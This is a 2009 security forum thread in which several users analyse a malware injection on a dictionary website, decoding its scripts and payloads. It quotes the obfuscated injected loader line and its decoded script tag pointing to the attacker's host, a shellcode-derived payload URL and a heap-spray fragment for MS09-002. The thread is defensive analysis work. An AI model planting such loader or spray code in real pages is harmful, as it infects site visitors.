Author Topic: malicious site (Read 17592 times)

Shawn Jefferson · June 02, 2009, 10:47:13 pm

Our symantec endpoint protection detected this site today, and had a preliminary look at it and it looks malicious:

http://www.yourdictionary.com/dictionary-articles/german-english-translation.html

loads scripts from www.rbseu.com 91.121.78.143 which then downloads or attempts from many other IPs.

Haven't looked at the files in too much depth from www.rbseu.com yet, but they are:

common.js
lastfunc.htm
m1.js
m2.js
subfunc.js (looks like it downloads a SWF file)

malware may have been removed from the download sites already?

PS. I've downloaded some of swf files that the subfunc.js downloads, but I'm having trouble decompiling them. I've tried Flare and the HP SWFScan, but neither are working for me. Any suggestions?

MysteryFCM · June 02, 2009, 11:18:26 pm

One of the payloads is at /style.jpg

I'm running the rest of the code through Malzilla to decode it and find the second payload.

Two other scripts it's got;

/s1.js
/s2.js

/edit

VT results for style.jpg

http://www.virustotal.com/analisis/35d1f712765ee7ac8c1af03187823cf6350951be6605b7606894fcf9b6d3682f-1243985377

Shawn Jefferson · June 02, 2009, 11:39:15 pm

I plugged the m1 and m2 scripts into Malzilla and I think I got the shellcode out... and did a XOR search that found an XOR key of 0xBC.

This URL pops out:

thpt/:w/wwr.sbuec.mot/poj.gp
http://www.rbseu.com/top.jpg

Just verified the MD5's and it's the same file as style.jpg.

MysteryFCM · June 02, 2009, 11:47:12 pm

~~According to Anubis and VT, top.jpg is the same as style.jpg;~~

http://anubis.iseclab.org/?action=result&task_id=1fa7eac4cc3407ab4f977479d9c585e86&format=html

/edit

hehe just noticed your mention of it's being the same as style.jpg .....

/edit 2

Sadly, the code I was asking Malzilla to decode, ended up crashing it (twas the mck wrapped code - definately some of the shell code, but couldn't get it to decode safely, and can't risk this machine). Wepawet couldn't deal with it either.

Shawn Jefferson · June 03, 2009, 06:37:11 pm

Hi,

Where did you get the s1 and s2 scripts? I didn't see them initially. edit2: found these myself!

How is the site infected? I didn't see anything on the source code of the page, and am not sure where else to look exactly!

edit: Found it! So simple, and I overlooked it once already. In the common.js script that loads from the yourdictionary.com site, there is this line:

Code: [Select]

document.XXXwrite(String.fromCharCode(60,83,67,82,73,80,84,32,76,65,78,71,85,65,71,69,61,34,74,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,98,115,101,117,46,99,111,109,47,99,111,109,109,111,110,46,106,115,34,62,60,47,115,99,114,105,112,116,62,10));

Malzilla decodes this for me:

Code: [Select]

<SCRIPT LANGUAGE="Javascript" src="http://www.rbseu.com/common.js"></script>
Also, I'd like to decompile the SWF file, but had no luck with either Flare or SWFScan. Are there other tools that may be able to do it?

It looks like the m1/m2 scripts are triggering the MS09-002 vulnerability.

for(var x=0;x<1000;x++)ruix1.push(document.createElement("i"+"mg"));

MysteryFCM · June 04, 2009, 08:16:47 am

You can use Wepawet to decode the SWF files online. There are a couple of offline tools to do it, but I can't for the life of me remember them atm

Shawn Jefferson · June 04, 2009, 03:42:15 pm

Hi,

I found Wepawet (you had mentioned it earlier) and uploaded a couple of the SWF files. They download menu.jpg which is an executable, but with a different MD5 than the previous ones.

Thanks!
Shawn

MysteryFCM · June 04, 2009, 07:46:22 pm

No problem

redwolfe_98 · June 05, 2009, 01:20:59 pm

"www .rbseu.com" has not yet been added to the "malwaredomainlist"..

SysAdMini · June 05, 2009, 01:55:38 pm

Quote from: redwolfe_98 on June 05, 2009, 01:20:59 pm

"www .rbseu.com" has not yet been added to the "malwaredomainlist"..

I don't see any malicious content at rbseu.com.

All urls at this domain return

Code: [Select]

<h1>Bad Request (Invalid Hostname)</h1>

MysteryFCM · June 05, 2009, 02:15:05 pm

Interesting .... seems it's been taken down .... (unusual for OVH to be so fast)

redwolfe_98 · June 05, 2009, 02:29:28 pm

Quote from: SysAdMini on June 05, 2009, 01:55:38 pm

Quote from: redwolfe_98 on June 05, 2009, 01:20:59 pm
"www .rbseu.com" has not yet been added to the "malwaredomainlist"..

I don't see any malicious content at rbseu.com.

All urls at this domain return
Code: [Select]
<h1>Bad Request (Invalid Hostname)</h1>

hey.. i put a space between "www" and ".rbseu.com" so that it wouldn't be a "hot" hyperlink.. according to "samspade", "www .rbseu.com" is resolving:

http://samspade.org/whois/www.rbseu.com

SysAdMini · June 05, 2009, 02:51:26 pm

Quote from: redwolfe_98 on June 05, 2009, 02:29:28 pm

hey.. i put a space between "www" and ".rbseu.com" so that it wouldn't be a "hot" hyperlink.. according to "samspade", "www .rbseu.com" is resolving:

http://samspade.org/whois/www.rbseu.com

It's resolving, but there is no content.

Author Topic: malicious site (Read 17592 times)

Shawn Jefferson

malicious site

MysteryFCM

Re: malicious site

Shawn Jefferson

Re: malicious site

MysteryFCM

Re: malicious site

Shawn Jefferson

Re: malicious site

MysteryFCM

Re: malicious site

Shawn Jefferson

Re: malicious site

MysteryFCM

Re: malicious site

redwolfe_98

Re: malicious site

SysAdMini

Re: malicious site

MysteryFCM

Re: malicious site

redwolfe_98

Re: malicious site

SysAdMini

Re: malicious site